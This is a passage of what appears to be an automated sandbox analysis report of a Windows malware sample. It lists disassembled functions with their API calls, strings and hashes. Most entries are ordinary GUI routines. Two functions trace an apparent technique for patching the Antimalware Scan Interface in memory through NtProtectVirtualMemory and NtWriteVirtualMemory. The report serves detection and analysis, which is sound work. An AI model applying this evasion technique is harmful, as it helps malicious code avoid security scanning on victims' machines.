                                                                                                    • GetSystemMetrics.USER32(00000003), ref: 032DDE54
                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 032DDE63
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 032DDE90
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 032DDE9E
                                                                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,032DDF07,?,00000000,?,?,?,00000000,?), ref: 032DDEC3
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 032DDF01
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 19621357-0
                                                                                                    • Opcode ID: 9ccd5eba085b926876b7a10f04099d356a2d657ebb604638e3a7227a5c7db05a
                                                                                                    • Instruction ID: 039181272a95addfc419dacdc9a77261a63f9c3bc58ec5effcb294d36e91cddd
                                                                                                    • Opcode Fuzzy Hash: 9ccd5eba085b926876b7a10f04099d356a2d657ebb604638e3a7227a5c7db05a
                                                                                                    • Instruction Fuzzy Hash: A2414C76A14209AECB10EAECCC41EEFB7BDAF49350F140551FA04FB281C671AA858760
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0330BD10 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 403processsynchronizationCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 032CFD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD78
                                                                                                      • Part of subcall function 032CFD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD86
                                                                                                      • Part of subcall function 032CFD40: GetProcAddress.KERNEL32(74F60000,00000000), ref: 032CFD9F
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDBB
                                                                                                      • Part of subcall function 032CFD40: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDC1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDEB
                                                                                                      • Part of subcall function 032CFD40: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDF1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000), ref: 032CFDFA
                                                                                                      • Part of subcall function 032CFD40: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000), ref: 032CFE00
                                                                                                      • Part of subcall function 032CFD40: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000), ref: 032CFE0B
                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?,ScanString,03330350,0330C3F8,OpenSession,03330350), ref: 0330C128
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,ScanString,03330350,0330C3F8,OpenSession,03330350,0330C3F8,ScanString,03330350,0330C3F8,OpenSession,03330350,0330C3F8,UacScan,03330350), ref: 0330C372
                                                                                                    • CloseHandle.KERNEL32(?,?,000000FF,ScanString,03330350,0330C3F8,OpenSession,03330350,0330C3F8,ScanString,03330350,0330C3F8,OpenSession,03330350,0330C3F8,UacScan), ref: 0330C37B
                                                                                                    • CloseHandle.KERNEL32(?,?,?,000000FF,ScanString,03330350,0330C3F8,OpenSession,03330350,0330C3F8,ScanString,03330350,0330C3F8,OpenSession,03330350,0330C3F8), ref: 0330C384
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentHandle$CloseLibraryMemoryVirtual$AddressCacheCreateFlushFreeInstructionLoadModuleObjectProcProtectSingleUserWaitWrite
                                                                                                    • String ID: Amsi$AmsiOpenSession$D$OpenSession$ScanString$UacScan
                                                                                                    • API String ID: 1580047464-2048511366
                                                                                                    • Opcode ID: d1e7d52665e4c945686b9d91c73d2434b861537b1825d098e365b67d3fbf9ece
                                                                                                    • Instruction ID: c4aa54e11a1ffd4b8b6288e24be51c0d619e54b958bfdfdb81d801005703a9a2
                                                                                                    • Opcode Fuzzy Hash: d1e7d52665e4c945686b9d91c73d2434b861537b1825d098e365b67d3fbf9ece
                                                                                                    • Instruction Fuzzy Hash: 3DF13B38A203299BDB15FB65CCD0BDEB3B9AF45340F5041E2D018AF256DAB4AEC58F51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B25CC Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 032B296A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                    • API String ID: 2030045667-32948583
                                                                                                    • Opcode ID: eb318e441d262f3940374c01d5d5ce26b6e8b877f6551b66669ba3bedb16ff5a
                                                                                                    • Instruction ID: e90ac949454aa7b5e5d46f839b3b82a5e8906b88fd8dc25e16f32c582769613b
                                                                                                    • Opcode Fuzzy Hash: eb318e441d262f3940374c01d5d5ce26b6e8b877f6551b66669ba3bedb16ff5a
                                                                                                    • Instruction Fuzzy Hash: 3BA1F934A24368CBDF21EA2CC884BD8B6F9EB0D790F1449E5E589DB345CBB489C5CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032DB264 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnumDisplayMonitors.USER32(?,?,?,?), ref: 032DB29D
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 032DB2C2
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 032DB2CD
                                                                                                    • GetClipBox.GDI32(?,?), ref: 032DB2DF
                                                                                                    • GetDCOrgEx.GDI32(?,?), ref: 032DB2EC
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 032DB305
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 032DB316
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 032DB32C
                                                                                                      • Part of subcall function 032DACBC: GetProcAddress.KERNEL32(76910000,00000000), ref: 032DAD3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                                    • String ID: EnumDisplayMonitors
                                                                                                    • API String ID: 362875416-2491903729
                                                                                                    • Opcode ID: 5462091944a1370c9f1fc21b4961d184b998dda7e230d5a741b04fdf8c8074ae
                                                                                                    • Instruction ID: 32a885a6b55f533d97a078cd30c204ab462e4034d578e711984f969d1a9d1ce2
                                                                                                    • Opcode Fuzzy Hash: 5462091944a1370c9f1fc21b4961d184b998dda7e230d5a741b04fdf8c8074ae
                                                                                                    • Instruction Fuzzy Hash: 63315076E1420EAFDB50DEA8C844AEFB7FCAF45600F058126E915E6200E7B4D5818BA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032EFF04 Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 032EFF4F
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 032EFF73
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 032EFF7E
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032EFF85
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 032EFF95
                                                                                                    • BeginPaint.USER32(00000000,?,00000000,032F0056,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 032EFFB7
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 032F0013
                                                                                                    • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 032F0024
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 032F003E
                                                                                                    • DeleteDC.GDI32(00000000), ref: 032F0047
                                                                                                    • DeleteObject.GDI32(?), ref: 032F0050
                                                                                                      • Part of subcall function 032EF90C: BeginPaint.USER32(00000000,?), ref: 032EF937
                                                                                                      • Part of subcall function 032EF90C: EndPaint.USER32(00000000,?,032EFA72), ref: 032EFA65
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3867285559-0
                                                                                                    • Opcode ID: 7390f1488fa7812d2ebcc6d3711e91d623385861eb27663dce70a26fc9285a85
                                                                                                    • Instruction ID: 07cad15e384894a1064139984933b45b330c02f5c8d7e1f5dc406ca540f4f8d8
                                                                                                    • Opcode Fuzzy Hash: 7390f1488fa7812d2ebcc6d3711e91d623385861eb27663dce70a26fc9285a85
                                                                                                    • Instruction Fuzzy Hash: 24415B39B10304AFDB10EBA8CD84BAEB7F8EF49740F5044A9F609DB381DAB59D458B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032E6E9C Relevance: 16.6, APIs: 11, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsWindowUnicode.USER32(?), ref: 032E6EB6
                                                                                                    • SetWindowLongW.USER32(?,000000FC,?), ref: 032E6ED1
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 032E6EDC
                                                                                                    • GetWindowLongW.USER32(?,000000F4), ref: 032E6EEE
                                                                                                    • SetWindowLongW.USER32(?,000000F4,?), ref: 032E6F01
                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 032E6F1A
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 032E6F25
                                                                                                    • GetWindowLongA.USER32(?,000000F4), ref: 032E6F37
                                                                                                    • SetWindowLongA.USER32(?,000000F4,?), ref: 032E6F4A
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 032E6F61
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 032E6F78
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$Prop$Unicode
                                                                                                    • String ID:
                                                                                                    • API String ID: 1693715928-0
                                                                                                    • Opcode ID: 4c2c421cfc2bbefd1a7850dd52b57cd8b6a931f887a37ed13c2bba8b81df71d8
                                                                                                    • Instruction ID: 62b131e61cddad02fa58c878aa728fab72283fb11a7c34c001463c3e476312ae
                                                                                                    • Opcode Fuzzy Hash: 4c2c421cfc2bbefd1a7850dd52b57cd8b6a931f887a37ed13c2bba8b81df71d8
                                                                                                    • Instruction Fuzzy Hash: BB31C879514248BBDF00EF9CDC84EEA77ECAF4C3A4F148691B958CB295C774D9809B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0330AE18 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 420libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,UacScan,03330350,0330B47C,OpenSession,03330350,0330B47C,ScanBuffer,03330350,0330B47C,00000000,0330B464), ref: 0330AF5F
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0330AF65
                                                                                                      • Part of subcall function 032CFD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD78
                                                                                                      • Part of subcall function 032CFD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD86
                                                                                                      • Part of subcall function 032CFD40: GetProcAddress.KERNEL32(74F60000,00000000), ref: 032CFD9F
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDBB
                                                                                                      • Part of subcall function 032CFD40: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDC1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDEB
                                                                                                      • Part of subcall function 032CFD40: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDF1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000), ref: 032CFDFA
                                                                                                      • Part of subcall function 032CFD40: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000), ref: 032CFE00
                                                                                                      • Part of subcall function 032CFD40: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000), ref: 032CFE0B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess$AddressHandleLibraryMemoryModuleProcVirtual$CacheFlushFreeInstructionLoadProtectWrite
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                    • API String ID: 2787793100-4174081549
                                                                                                    • Opcode ID: 458bf2677642813dfcf529c7e6c868515af23c691bdf1e1e761e80499fcae63e
                                                                                                    • Instruction ID: 8b258872115fb743f29c11814856129e1f62f31bc13272016579e4f1cbe19074
                                                                                                    • Opcode Fuzzy Hash: 458bf2677642813dfcf529c7e6c868515af23c691bdf1e1e761e80499fcae63e
                                                                                                    • Instruction Fuzzy Hash: FCF11138A202189FDB14FBA5D9D0FCEB7B9EF44340F1180A5E144AF256DB70EE858B51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032EFAA4 Relevance: 15.2, APIs: 10, Instructions: 227windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RectVisible.GDI32(00000000,?), ref: 032EFBBC
                                                                                                    • SaveDC.GDI32(00000000), ref: 032EFBDF
                                                                                                    • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 032EFC1F
                                                                                                    • RestoreDC.GDI32(00000000,00000000), ref: 032EFC4B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$ClipIntersectRestoreSaveVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 1976014923-0
                                                                                                    • Opcode ID: f6f61e20dccdf9be0f5ee39e20a922feec740032bd05449bfe6bf1ee64f09daa
                                                                                                    • Instruction ID: 392b454ed66e6ed0839cd073bf248c1c502f63272f08a8ba8505ba26f5ba278c
                                                                                                    • Opcode Fuzzy Hash: f6f61e20dccdf9be0f5ee39e20a922feec740032bd05449bfe6bf1ee64f09daa
                                                                                                    • Instruction Fuzzy Hash: FB911674A10249AFDB04DFA8C585FEEBBF8AF08704F5940A4E904EB252D775E980CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032FF110 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemMenu.USER32(00000000,00000000), ref: 032FF15B
                                                                                                    • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 032FF179
                                                                                                    • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 032FF186
                                                                                                    • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 032FF193
                                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 032FF1A0
                                                                                                    • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 032FF1AD
                                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 032FF1BA
                                                                                                    • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 032FF1C7
                                                                                                    • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 032FF1E5
                                                                                                    • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 032FF201
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Delete$EnableItem$System
                                                                                                    • String ID:
                                                                                                    • API String ID: 3985193851-0
                                                                                                    • Opcode ID: 313c49e9c89adff7db6b8cd284efb0d9489ddccdcc28967ae6050d332f119f6e
                                                                                                    • Instruction ID: 85fabdb81a8b3f486dec9aa3124d94d1915c9525f50b75f81a966582bc389326
                                                                                                    • Opcode Fuzzy Hash: 313c49e9c89adff7db6b8cd284efb0d9489ddccdcc28967ae6050d332f119f6e
                                                                                                    • Instruction Fuzzy Hash: C4213E793A4345BEE720EB24CD8DF9ABBE86B04B54F0440A0B6496F6D2C7F4E9C08754
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B25CA Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • Unexpected Memory Leak, xrefs: 032B295C
                                                                                                    • 7, xrefs: 032B273D
                                                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 032B28E5
                                                                                                    • An unexpected memory leak has occurred. , xrefs: 032B272C
                                                                                                    • bytes: , xrefs: 032B27F9
                                                                                                    • , xrefs: 032B28B0
                                                                                                    • The unexpected small block leaks are:, xrefs: 032B27A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                    • API String ID: 0-2723507874
                                                                                                    • Opcode ID: b4cdd8e2597479994a2be9851709b40ba6d1cb19d7da4938eef1818c14d6be8b
                                                                                                    • Instruction ID: 0b7ffc32775c1229e5ab566a515b80babdf882efa83b399e05c518ee8039d543
                                                                                                    • Opcode Fuzzy Hash: b4cdd8e2597479994a2be9851709b40ba6d1cb19d7da4938eef1818c14d6be8b
                                                                                                    • Instruction Fuzzy Hash: C871C634A24368CBDF21EA2CC884BD8B6F9EB0D780F1449E5D18DDB245DBB489C5CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032EA188 Relevance: 13.7, APIs: 9, Instructions: 154COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 032EA1C3
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 032EA1DD
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 032EA20B
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 032EA221
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 032EA259
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 032EA271
                                                                                                      • Part of subcall function 032D2514: MulDiv.KERNEL32(00000000,00000048,?), ref: 032D2525
                                                                                                    • MulDiv.KERNEL32(?), ref: 032EA2C8
                                                                                                    • MulDiv.KERNEL32(?), ref: 032EA2F2
                                                                                                    • MulDiv.KERNEL32(00000000), ref: 032EA318
                                                                                                      • Part of subcall function 032D2530: MulDiv.KERNEL32(00000000,?,00000048), ref: 032D253D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 62d55de0d4e188b73f9b256e420affa46d3a52c05ec87d03101080e94fa94bb4
                                                                                                    • Instruction ID: 5b83fbd9611e52f87ffe6fa62fe7e4015bd6ac042591a9760c95162c70d3cfa3
                                                                                                    • Opcode Fuzzy Hash: 62d55de0d4e188b73f9b256e420affa46d3a52c05ec87d03101080e94fa94bb4
                                                                                                    • Instruction Fuzzy Hash: EA514C74618751AFC320EB69C845BAAFBF9AF45740F488C1DB9D5DB341C6B6E884CB20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03302AAC Relevance: 13.6, APIs: 9, Instructions: 132windowregistryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
